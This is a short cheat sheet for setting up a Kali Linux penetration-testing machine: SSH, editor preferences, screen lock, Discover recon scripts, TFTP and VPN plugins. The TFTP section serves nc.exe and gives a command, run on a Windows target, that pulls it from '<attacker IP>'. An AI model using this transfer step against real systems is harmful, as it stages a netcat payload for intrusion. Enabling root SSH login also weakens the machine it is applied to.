Kali


# Change root password

passwd
------------------------------------------------------------------------------------------------------

# SSH

ssh-keygen                                       Create new keys

/etc/ssh/sshd_config                             Daemon config file
PermitRootLogin yes                              Change to yes
AuthorizedKeysFile                               Uncomment

service ssh start                                Start ssh
netstat -antp | grep ssh                         Verify the service is running
update-rc.d ssh enable                           Enable ssh to start at boot time
update-rc.d ssh disable                          Disable ssh from starting at boot time
------------------------------------------------------------------------------------------------------

# Terminal

Edit > Profile Preferences
Colors: Uncheck Use transparent background
------------------------------------------------------------------------------------------------------

# vim

Create /root/.vimrc
syntax on
set wrapmargin=8
set number
------------------------------------------------------------------------------------------------------

# Disable screen lock

Top right icon > tools icon > Power
Power Saving > Blank screen: Never
Back arrow
Privacy > Screen Lock > Automatic Screen Lock: Off
------------------------------------------------------------------------------------------------------

# gedit

Preferences
View: Display line numbers, Highlight current line
Editor: Tab width 5, Insert spaces instead of tabs
Color Scheme: Oblivion
------------------------------------------------------------------------------------------------------

# Install Discover scripts

git clone git://github.com/leebaird/discover.git /opt/discover/
cd /opt/discover/
./update.sh
------------------------------------------------------------------------------------------------------

# TFTP

mkdir /tftp                                      Create a new home folder for tftp
atftpd --daemon --port 69 /tftp                  Start tftp and assign home folder
netstat -anup | grep atftp                       Verify the service is running
cp /usr/share/windows-binaries/nc.exe /tftp/
tftp -i <attacker IP> get nc.exe                 Run from Windows
------------------------------------------------------------------------------------------------------

# VPN

apt-get install network-manager-iodine network-manager-iodine-gnome
apt-get install network-manager-openconnect network-manager-openconnect-gnome
apt-get install network-manager-openvpn network-manager-openvpn-gnome
apt-get install network-manager-pptp network-manager-pptp-gnome
apt-get install network-manager-strongswan
apt-get install network-manager-vpnc network-manager-vpnc-gnome
/etc/init.d/network-manager restart

# Thanks to Robert Clowser for the bug fix!
nano /etc/network/interfaces
Remove the last two lines egarding eth0. 
Reboot
